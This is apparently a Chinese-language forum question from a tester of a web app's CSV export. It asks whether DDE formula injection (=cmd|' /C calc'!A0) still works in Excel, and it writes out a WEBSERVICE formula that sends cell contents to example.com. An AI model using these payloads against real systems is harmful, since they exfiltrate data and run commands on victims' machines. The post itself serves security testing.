我目前正在测试一个用户可以在其上生成 CSV 的 Web 应用程序。我设法使用有效载荷通过 CSV 注入来泄露数据,例如:
=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))
我现在正在尝试创建一个“更危险”的有效负载,并且我在网上看到了很多参考资料,例如:
=cmd|' /C calc'!A0
但是,我找不到这样的有效负载触发器的方法,我总是得到一个#REF!
错误。这种攻击在 2020 年还可行吗?或者微软是否针对这些攻击实施了缓解措施?
我正在为 Office 365 版本 1902 运行 Excel。